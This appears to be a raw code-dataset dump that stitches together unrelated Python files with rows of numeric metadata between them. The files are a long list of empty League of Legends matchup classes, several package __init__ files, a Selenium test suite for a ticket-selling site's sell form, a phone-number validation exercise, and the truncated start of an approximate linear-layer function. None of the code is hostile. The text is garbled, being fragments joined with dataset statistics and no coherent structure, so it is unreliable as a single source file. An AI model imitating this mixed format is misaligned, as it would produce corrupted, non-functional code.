class NA_Gangplank_Jng_Akali(Ratings):
pass
class NA_Gangplank_Jng_Alistar(Ratings):
pass
class NA_Gangplank_Jng_Amumu(Ratings):
pass
class NA_Gangplank_Jng_Anivia(Ratings):
pass
class NA_Gangplank_Jng_Annie(Ratings):
pass
class NA_Gangplank_Jng_Ashe(Ratings):
pass
class NA_Gangplank_Jng_AurelionSol(Ratings):
pass
class NA_Gangplank_Jng_Azir(Ratings):
pass
class NA_Gangplank_Jng_Bard(Ratings):
pass
class NA_Gangplank_Jng_Blitzcrank(Ratings):
pass
class NA_Gangplank_Jng_Brand(Ratings):
pass
class NA_Gangplank_Jng_Braum(Ratings):
pass
class NA_Gangplank_Jng_Caitlyn(Ratings):
pass
class NA_Gangplank_Jng_Camille(Ratings):
pass
class NA_Gangplank_Jng_Cassiopeia(Ratings):
pass
class NA_Gangplank_Jng_Chogath(Ratings):
pass
class NA_Gangplank_Jng_Corki(Ratings):
pass
class NA_Gangplank_Jng_Darius(Ratings):
pass
class NA_Gangplank_Jng_Diana(Ratings):
pass
class NA_Gangplank_Jng_Draven(Ratings):
pass
class NA_Gangplank_Jng_DrMundo(Ratings):
pass
class NA_Gangplank_Jng_Ekko(Ratings):
pass
class NA_Gangplank_Jng_Elise(Ratings):
pass
class NA_Gangplank_Jng_Evelynn(Ratings):
pass
class NA_Gangplank_Jng_Ezreal(Ratings):
pass
class NA_Gangplank_Jng_Fiddlesticks(Ratings):
pass
class NA_Gangplank_Jng_Fiora(Ratings):
pass
class NA_Gangplank_Jng_Fizz(Ratings):
pass
class NA_Gangplank_Jng_Galio(Ratings):
pass
class NA_Gangplank_Jng_Gangplank(Ratings):
pass
class NA_Gangplank_Jng_Garen(Ratings):
pass
class NA_Gangplank_Jng_Gnar(Ratings):
pass
class NA_Gangplank_Jng_Gragas(Ratings):
pass
class NA_Gangplank_Jng_Graves(Ratings):
pass
class NA_Gangplank_Jng_Hecarim(Ratings):
pass
class NA_Gangplank_Jng_Heimerdinger(Ratings):
pass
class NA_Gangplank_Jng_Illaoi(Ratings):
pass
class NA_Gangplank_Jng_Irelia(Ratings):
pass
class NA_Gangplank_Jng_Ivern(Ratings):
pass
class NA_Gangplank_Jng_Janna(Ratings):
pass
class NA_Gangplank_Jng_JarvanIV(Ratings):
pass
class NA_Gangplank_Jng_Jax(Ratings):
pass
class NA_Gangplank_Jng_Jayce(Ratings):
pass
class NA_Gangplank_Jng_Jhin(Ratings):
pass
class NA_Gangplank_Jng_Jinx(Ratings):
pass
class NA_Gangplank_Jng_Kalista(Ratings):
pass
class NA_Gangplank_Jng_Karma(Ratings):
pass
class NA_Gangplank_Jng_Karthus(Ratings):
pass
class NA_Gangplank_Jng_Kassadin(Ratings):
pass
class NA_Gangplank_Jng_Katarina(Ratings):
pass
class NA_Gangplank_Jng_Kayle(Ratings):
pass
class NA_Gangplank_Jng_Kayn(Ratings):
pass
class NA_Gangplank_Jng_Kennen(Ratings):
pass
class NA_Gangplank_Jng_Khazix(Ratings):
pass
class NA_Gangplank_Jng_Kindred(Ratings):
pass
class NA_Gangplank_Jng_Kled(Ratings):
pass
class NA_Gangplank_Jng_KogMaw(Ratings):
pass
class NA_Gangplank_Jng_Leblanc(Ratings):
pass
class NA_Gangplank_Jng_LeeSin(Ratings):
pass
class NA_Gangplank_Jng_Leona(Ratings):
pass
class NA_Gangplank_Jng_Lissandra(Ratings):
pass
class NA_Gangplank_Jng_Lucian(Ratings):
pass
class NA_Gangplank_Jng_Lulu(Ratings):
pass
class NA_Gangplank_Jng_Lux(Ratings):
pass
class NA_Gangplank_Jng_Malphite(Ratings):
pass
class NA_Gangplank_Jng_Malzahar(Ratings):
pass
class NA_Gangplank_Jng_Maokai(Ratings):
pass
class NA_Gangplank_Jng_MasterYi(Ratings):
pass
class NA_Gangplank_Jng_MissFortune(Ratings):
pass
class NA_Gangplank_Jng_MonkeyKing(Ratings):
pass
class NA_Gangplank_Jng_Mordekaiser(Ratings):
pass
class NA_Gangplank_Jng_Morgana(Ratings):
pass
class NA_Gangplank_Jng_Nami(Ratings):
pass
class NA_Gangplank_Jng_Nasus(Ratings):
pass
class NA_Gangplank_Jng_Nautilus(Ratings):
pass
class NA_Gangplank_Jng_Nidalee(Ratings):
pass
class NA_Gangplank_Jng_Nocturne(Ratings):
pass
class NA_Gangplank_Jng_Nunu(Ratings):
pass
class NA_Gangplank_Jng_Olaf(Ratings):
pass
class NA_Gangplank_Jng_Orianna(Ratings):
pass
class NA_Gangplank_Jng_Ornn(Ratings):
pass
class NA_Gangplank_Jng_Pantheon(Ratings):
pass
class NA_Gangplank_Jng_Poppy(Ratings):
pass
class NA_Gangplank_Jng_Quinn(Ratings):
pass
class NA_Gangplank_Jng_Rakan(Ratings):
pass
class NA_Gangplank_Jng_Rammus(Ratings):
pass
class NA_Gangplank_Jng_RekSai(Ratings):
pass
class NA_Gangplank_Jng_Renekton(Ratings):
pass
class NA_Gangplank_Jng_Rengar(Ratings):
pass
class NA_Gangplank_Jng_Riven(Ratings):
pass
class NA_Gangplank_Jng_Rumble(Ratings):
pass
class NA_Gangplank_Jng_Ryze(Ratings):
pass
class NA_Gangplank_Jng_Sejuani(Ratings):
pass
class NA_Gangplank_Jng_Shaco(Ratings):
pass
class NA_Gangplank_Jng_Shen(Ratings):
pass
class NA_Gangplank_Jng_Shyvana(Ratings):
pass
class NA_Gangplank_Jng_Singed(Ratings):
pass
class NA_Gangplank_Jng_Sion(Ratings):
pass
class NA_Gangplank_Jng_Sivir(Ratings):
pass
class NA_Gangplank_Jng_Skarner(Ratings):
pass
class NA_Gangplank_Jng_Sona(Ratings):
pass
class NA_Gangplank_Jng_Soraka(Ratings):
pass
class NA_Gangplank_Jng_Swain(Ratings):
pass
class NA_Gangplank_Jng_Syndra(Ratings):
pass
class NA_Gangplank_Jng_TahmKench(Ratings):
pass
class NA_Gangplank_Jng_Taliyah(Ratings):
pass
class NA_Gangplank_Jng_Talon(Ratings):
pass
class NA_Gangplank_Jng_Taric(Ratings):
pass
class NA_Gangplank_Jng_Teemo(Ratings):
pass
class NA_Gangplank_Jng_Thresh(Ratings):
pass
class NA_Gangplank_Jng_Tristana(Ratings):
pass
class NA_Gangplank_Jng_Trundle(Ratings):
pass
class NA_Gangplank_Jng_Tryndamere(Ratings):
pass
class NA_Gangplank_Jng_TwistedFate(Ratings):
pass
class NA_Gangplank_Jng_Twitch(Ratings):
pass
class NA_Gangplank_Jng_Udyr(Ratings):
pass
class NA_Gangplank_Jng_Urgot(Ratings):
pass
class NA_Gangplank_Jng_Varus(Ratings):
pass
class NA_Gangplank_Jng_Vayne(Ratings):
pass
class NA_Gangplank_Jng_Veigar(Ratings):
pass
class NA_Gangplank_Jng_Velkoz(Ratings):
pass
class NA_Gangplank_Jng_Vi(Ratings):
pass
class NA_Gangplank_Jng_Viktor(Ratings):
pass
class NA_Gangplank_Jng_Vladimir(Ratings):
pass
class NA_Gangplank_Jng_Volibear(Ratings):
pass
class NA_Gangplank_Jng_Warwick(Ratings):
pass
class NA_Gangplank_Jng_Xayah(Ratings):
pass
class NA_Gangplank_Jng_Xerath(Ratings):
pass
class NA_Gangplank_Jng_XinZhao(Ratings):
pass
class NA_Gangplank_Jng_Yasuo(Ratings):
pass
class NA_Gangplank_Jng_Yorick(Ratings):
pass
class NA_Gangplank_Jng_Zac(Ratings):
pass
class NA_Gangplank_Jng_Zed(Ratings):
pass
class NA_Gangplank_Jng_Ziggs(Ratings):
pass
class NA_Gangplank_Jng_Zilean(Ratings):
pass
class NA_Gangplank_Jng_Zyra(Ratings):
pass
| 16.688249 | 46 | 0.780572 | 972 | 6,959 | 5.162551 | 0.151235 | 0.192507 | 0.440016 | 0.522519 | 0.819051 | 0.819051 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159649 | 6,959 | 416 | 47 | 16.728365 | 0.858071 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
eb00da8f7d529cae82c52d867430abed9dd17254 | 138 | py | Python | plantcv/learn/__init__.py | luuvt/plantcv | 7548d308645edba2b347c16cb62922dddbca7ab8 | [
"MIT"
] | null | null | null | plantcv/learn/__init__.py | luuvt/plantcv | 7548d308645edba2b347c16cb62922dddbca7ab8 | [
"MIT"
] | null | null | null | plantcv/learn/__init__.py | luuvt/plantcv | 7548d308645edba2b347c16cb62922dddbca7ab8 | [
"MIT"
] | 1 | 2020-08-13T17:44:53.000Z | 2020-08-13T17:44:53.000Z | from plantcv.learn.naive_bayes import naive_bayes
from plantcv.learn.naive_bayes import naive_bayes_multiclass
__all__ = ["naive_bayes"]
| 27.6 | 60 | 0.847826 | 20 | 138 | 5.35 | 0.4 | 0.46729 | 0.299065 | 0.392523 | 0.785047 | 0.785047 | 0.785047 | 0.785047 | 0 | 0 | 0 | 0 | 0.086957 | 138 | 4 | 61 | 34.5 | 0.849206 | 0 | 0 | 0 | 0 | 0 | 0.07971 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
de2f11bf48a55f83fd53c0654bfb243d700c5aee | 109 | py | Python | RL/utilities/visualisation/__init__.py | cnHeider/gym_solutions | 737610a9b1c0ccf30d9f2213edca841c6a39f5bb | [
"Apache-2.0"
] | 2 | 2017-11-12T15:02:54.000Z | 2017-12-08T15:03:24.000Z | RL/utilities/visualisation/__init__.py | cnHeider/gym_solutions | 737610a9b1c0ccf30d9f2213edca841c6a39f5bb | [
"Apache-2.0"
] | null | null | null | RL/utilities/visualisation/__init__.py | cnHeider/gym_solutions | 737610a9b1c0ccf30d9f2213edca841c6a39f5bb | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
from .run_visdom_server import run_visdom_server
from .visualisation import update_visualiser
| 27.25 | 48 | 0.862385 | 16 | 109 | 5.5625 | 0.6875 | 0.202247 | 0.337079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.091743 | 109 | 3 | 49 | 36.333333 | 0.888889 | 0.110092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
de4a4ae26da07ca918961e772b1c0b30c9f0a1fd | 138 | py | Python | __init__.py | dpedrosac/cDBS | 75ddb6a37a6f3b25f428005afc4e882bf31b09bf | [
"MIT"
] | null | null | null | __init__.py | dpedrosac/cDBS | 75ddb6a37a6f3b25f428005afc4e882bf31b09bf | [
"MIT"
] | 6 | 2020-09-04T23:35:01.000Z | 2021-05-16T00:09:38.000Z | __init__.py | dpedrosac/cDBS | 75ddb6a37a6f3b25f428005afc4e882bf31b09bf | [
"MIT"
] | null | null | null | try:
from .version import __version__
except ModuleNotFoundError:
pass
from .utils import *
from .GUI import *
from .ext import * | 17.25 | 36 | 0.731884 | 17 | 138 | 5.705882 | 0.588235 | 0.206186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.202899 | 138 | 8 | 37 | 17.25 | 0.881818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.142857 | 0.571429 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
de839c59e96d591d557d9c5c035bf93e2a791fbe | 13,414 | py | Python | qa327_test/main/test_R4.py | EduardVar/BrainBench | abc26c5a6e7492e5c0ef03457c91175b0bb8ba41 | [
"MIT"
] | null | null | null | qa327_test/main/test_R4.py | EduardVar/BrainBench | abc26c5a6e7492e5c0ef03457c91175b0bb8ba41 | [
"MIT"
] | null | null | null | qa327_test/main/test_R4.py | EduardVar/BrainBench | abc26c5a6e7492e5c0ef03457c91175b0bb8ba41 | [
"MIT"
] | 2 | 2021-01-04T04:44:28.000Z | 2021-01-16T19:41:29.000Z | import pytest
import requests
import time
from qa327 import backend
from qa327.models import User
from werkzeug.security import generate_password_hash
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from datetime import date
@pytest.mark.usefixtures('server')
def test_server_is_live():
r = requests.get(base_url)
assert r.status_code == 200
@pytest.mark.usefixtures('server')
class Tests_R4(BaseCase):
def register(self):
""" Register new user"""
self.open(base_url + '/register')
self.type("#email", "pytest@test.com")
self.type("#name", "pytest")
self.type("#password", "PYTESTpassword!")
self.type("#password2", "PYTESTpassword!")
self.click('input[type="submit"]')
def login(self):
""" Login to Swag Labs and verify that login was successful. """
self.open(base_url + '/login')
self.type("#email", "pytest@test.com")
self.type("#password", "PYTESTpassword!")
self.click('input[type="submit"]')
def refresh(self):
backend.clean_database()
self.open(base_url + '/logout')
self.register()
self.login()
self.open(base_url)
def test_nameAlphaNumeric_Positive(self): # Test case R4.1.1
""" /sell[POST] The name of the ticket is alphanumeric - positive case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "b@d!_nam3")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_element("#error_msg")
self.assert_text("Name must be alphanumeric", "#error_msg")
def test_nameAlphaNumeric_Negative(self): # Test case R4.1.1
""" /sell[POST] The name of the ticket is alphanumeric - negative case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validTicketName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Name must be alphanumeric", "#error_msg")
def test_nameSpace_Negative(self): # Test case R4.1.2
""" /sell[POST] The name of the ticket allows spaces only if it is not the first or the last character - negative error case, .strip is used"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", " validTicketName ")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_element("#validTicketName") #confirm name has been stripped and is availble for purchase
def test_nameLength_Positive(self): # Test case R4.2.1
""" /sell[POST] The name of the ticket is no longer than 60 characters - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "verylongstringohmythisisanextemelywrongnameIwonderifievenspeltextremelycorrectly")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Name length must be between 6 and 60 characters", "#error_msg")
def test_nameLength_Negative(self): # Test case R4.2.1
""" /sell[POST] The name of the ticket is no longer than 60 characters - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName2")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Name length must be between 6 and 60 characters", "#error_msg")
def test_quantityZero_Positive(self): # Test case R4.3.1
""" /sell[POST] The quantity of the tickets has to be more than 0 - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "0")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Please select 1 to 100 tickets", "#error_msg")
def test_quantityZero_Negative(self): # Test case R4.3.1
"""" /sell[POST] The quantity of the tickets has to be more than 0 - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "1")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Please select 1 to 100 tickets", "#error_msg")
def test_quantityHundred_Positive(self): # Test case R4.3.2
""" /sell[POST] The quantity of the tickets has to be less than or equal to 100 - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "101")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Please select 1 to 100 tickets", "#error_msg")
def test_quantityHundred_Negative(self): # Test case R4.3.2
""" /sell[POST] The quantity of the tickets has to be less than or equal to 100 - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "100")
self.type("#sell-ticket-price", "20")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Please select 1 to 100 tickets", "#error_msg")
def test_priceTen_Positive(self): # Test case R4.4.1
""" /sell[POST] Price has to be more than/equal to 10 - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "9")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Please enter an amount between 10 and 100", "#error_msg")
def test_priceTen_Negative(self): # Test case R4.4.1
""" /sell[POST] Price has to be more than/equal to 10 - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "10")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Please enter an amount between 10 and 100", "#error_msg")
def test_priceHundred_Positive(self): # Test case R4.4.2
""" /sell[POST] Price has to be less/than equal to 100 - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "101")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text("Please enter an amount between 10 and 100", "#error_msg")
def test_priceHundred_Negative(self): # Test case R4.4.2
""" /sell[POST] Price has to be less/than equal to 100 - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("Please enter an amount between 10 and 100", "#error_msg")
def test_wrongDate_Positive(self): # Test case R4.5.1
""" /sell[POST] Date must be after the current date YYYYMMDD (e.g. 20200901) - positive error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", "20200901")
self.click('#sell-ticket-button')
self.assert_text("This ticket has expired", "#error_msg")
def test_wrongDate_Negative(self): # Test case R4.5.1
""" /sell[POST] Date must be given in the format YYYYMMDD (e.g. 20200901) - negative error case"""
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_not_visible("This ticket has expired", "#error_msg")
def test_redirectConfirm(self): # Test case R4.6.1
""" For any errors, redirect back to / and show an error message """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "b@dn@m3")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
assert str(self.get_link_status_code(base_url + "/"))
self.assert_text("Name must be alphanumeric", "#error_msg")
def test_ownerConfirm(self): # Test case R4.7.1
""" The added new ticket information will be posted on the user profile page - owner """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_element("#btn-update-validName") #user will be able to see and update their own ticket confirmation
def test_nameConfirm(self): # Test case R4.7.2
""" The added new ticket information will be posted on the user profile page - name """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_element("#btn-update-validName") #user will be able to see and update their own ticket confirmation
def test_quantityConfirm(self): # Test case R4.7.3
""" The added new ticket information will be posted on the user profile page - quantity """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_visible("10")
def test_priceConfirm(self): # Test case R4.7.4
""" The added new ticket information will be posted on the user profile page - price """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_visible("100.0")
def test_dateConfirm(self): # Test case R4.7.5
""" The added new ticket information will be posted on the user profile page - date """
self.refresh()
self.click("#btn-add-ticket")
self.type("#sell-ticket-name", "validName")
self.type("#sell-ticket-quantity", "10")
self.type("#sell-ticket-price", "100")
self.type("#sell-datetime", date.today().strftime("%Y/%m/%d"))
self.click('#sell-ticket-button')
self.assert_text_visible(date.today().strftime("%Y%m%d"))
| 42.18239 | 151 | 0.6116 | 1,780 | 13,414 | 4.546629 | 0.107865 | 0.088966 | 0.124552 | 0.140121 | 0.845669 | 0.819103 | 0.804893 | 0.791548 | 0.7656 | 0.7656 | 0 | 0.025599 | 0.222454 | 13,414 | 317 | 152 | 42.315457 | 0.750336 | 0.178396 | 0 | 0.691964 | 1 | 0 | 0.336281 | 0.051856 | 0 | 0 | 0 | 0 | 0.107143 | 1 | 0.111607 | false | 0.017857 | 0.040179 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
de869398b539a8b1cf0a2b20263dacbbd30a7601 | 4,294 | py | Python | lista-5/05_telefone.py | outrofelipe/Python-para-zumbis | 3bf1361c41ec6a8fa2bdc1a745230e630b73edd8 | [
"MIT"
] | 3 | 2016-12-23T13:20:43.000Z | 2018-04-24T23:10:59.000Z | lista-5/05_telefone.py | outrofelipe/Python-para-zumbis | 3bf1361c41ec6a8fa2bdc1a745230e630b73edd8 | [
"MIT"
] | null | null | null | lista-5/05_telefone.py | outrofelipe/Python-para-zumbis | 3bf1361c41ec6a8fa2bdc1a745230e630b73edd8 | [
"MIT"
] | 1 | 2017-07-13T23:53:34.000Z | 2017-07-13T23:53:34.000Z | '''
Questão E. Na pacata vila campestre de Ponteironuloville, todos os telefones têm 6
dígitos. A companhia telefônica estabelece as seguintes regras sobre os números:
1. Não pode haver dois dígitos consecutivos idênticos, porque isso é chato;
2. A soma dos dígitos tem que ser par, porque isso é legal;
3. O último dígito não pode ser igual ao primeiro, porque isso dá azar.
Então, dadas essas regras perfeitamente razoáveis, bem projetadas e maduras,
quantos números de telefone na lista abaixo são válidos?
213752 216732 221063 221545 225583 229133 230648 233222
236043 237330 239636 240138 242123 246224 249183 252936
254711 257200 257607 261424 263814 266794 268649 273050
275001 277606 278997 283331 287104 287953 289137 291591
292559 292946 295180 295566 297529 300400 304707 306931
310638 313595 318449 319021 322082 323796 326266 326880
327249 329914 334392 334575 336723 336734 338808 343269
346040 350113 353631 357154 361633 361891 364889 365746
365749 366426 369156 369444 369689 372896 374983 375223
379163 380712 385640 386777 388599 389450 390178 392943
394742 395921 398644 398832 401149 402219 405364 408088
412901 417683 422267 424767 426613 430474 433910 435054
440052 444630 447852 449116 453865 457631 461750 462985
463328 466458 469601 473108 476773 477956 481991 482422
486195 488359 489209 489388 491928 496569 496964 497901
500877 502386 502715 507617 512526 512827 513796 518232
521455 524277 528496 529345 531231 531766 535067 535183
536593 537360 539055 540582 543708 547492 550779 551595
556493 558807 559102 562050 564962 569677 570945 575447
579937 580112 580680 582458 583012 585395 586244 587393
590483 593112 593894 594293 597525 598184 600455 600953
601523 605761 608618 609198 610141 610536 612636 615233
618314 622752 626345 626632 628889 629457 629643 633673
637656 641136 644176 644973 647617 652218 657143 659902
662224 666265 668010 672480 672695 676868 677125 678315
Autor: Felipe Nogueira de Souza
'''
def consecutivos(num):
for i in range(5):
if n[i] == n[i+1]:
return True
return False
def par(num):
soma = 0
for i in range(6):
soma += int(n[i])
if soma % 2 == 0:
return True
return False
def iguais(num):
if n[0] == n[5]:
return True
return False
telefones = ("213752 216732 221063 221545 225583 229133 230648 233222\
236043 237330 239636 240138 242123 246224 249183 252936\
254711 257200 257607 261424 263814 266794 268649 273050\
275001 277606 278997 283331 287104 287953 289137 291591\
292559 292946 295180 295566 297529 300400 304707 306931\
310638 313595 318449 319021 322082 323796 326266 326880\
327249 329914 334392 334575 336723 336734 338808 343269\
346040 350113 353631 357154 361633 361891 364889 365746\
365749 366426 369156 369444 369689 372896 374983 375223\
379163 380712 385640 386777 388599 389450 390178 392943\
394742 395921 398644 398832 401149 402219 405364 408088\
412901 417683 422267 424767 426613 430474 433910 435054\
440052 444630 447852 449116 453865 457631 461750 462985\
463328 466458 469601 473108 476773 477956 481991 482422\
486195 488359 489209 489388 491928 496569 496964 497901\
500877 502386 502715 507617 512526 512827 513796 518232\
521455 524277 528496 529345 531231 531766 535067 535183\
536593 537360 539055 540582 543708 547492 550779 551595\
556493 558807 559102 562050 564962 569677 570945 575447\
579937 580112 580680 582458 583012 585395 586244 587393\
590483 593112 593894 594293 597525 598184 600455 600953\
601523 605761 608618 609198 610141 610536 612636 615233\
618314 622752 626345 626632 628889 629457 629643 633673\
637656 641136 644176 644973 647617 652218 657143 659902\
662224 666265 668010 672480 672695 676868 677125 678315")
telefones = telefones.split()
cont = 0
for n in telefones:
n = list(n)
if not consecutivos(n):
if par(n):
if not iguais(n):
cont += 1
print(cont)
| 46.673913 | 82 | 0.722403 | 567 | 4,294 | 5.470899 | 0.5097 | 0.009671 | 0.015474 | 0.020309 | 0.789168 | 0.773694 | 0.773694 | 0.773694 | 0.773694 | 0.773694 | 0 | 0.750155 | 0.250582 | 4,294 | 91 | 83 | 47.186813 | 0.213797 | 0.451095 | 0 | 0.12 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0 | 1 | 0.06 | false | 0 | 0 | 0 | 0.18 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
decf231a82e74b2e6d33ad6b1869a6620b5b0f0e | 24,248 | py | Python | ApproxSrc/functional/approx_linear.py | sirius0000/SR-Mongoose | 068068c7fbc6d1b1bb33ffa31529dda55580b7f2 | [
"MIT"
] | 5 | 2021-07-08T12:28:27.000Z | 2022-03-10T16:44:25.000Z | ApproxSrc/functional/approx_linear.py | sirius0000/SR-Mongoose | 068068c7fbc6d1b1bb33ffa31529dda55580b7f2 | [
"MIT"
] | null | null | null | ApproxSrc/functional/approx_linear.py | sirius0000/SR-Mongoose | 068068c7fbc6d1b1bb33ffa31529dda55580b7f2 | [
"MIT"
] | 2 | 2021-10-20T04:29:11.000Z | 2022-03-10T16:44:29.000Z | import torch
from ..modules.utils import *
def approx_linear_forward(input,weight,bias,sample_ratio,minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu):
r"""
Applies approximate linear transformation to the incoming data: :math:`y = xA^T + b`.
the matrix multiply xA^T is approximated
note: weight transposition is done in this function
Shape:
- Input: :math:`(N, *, in\_features)` where `*` means any number of
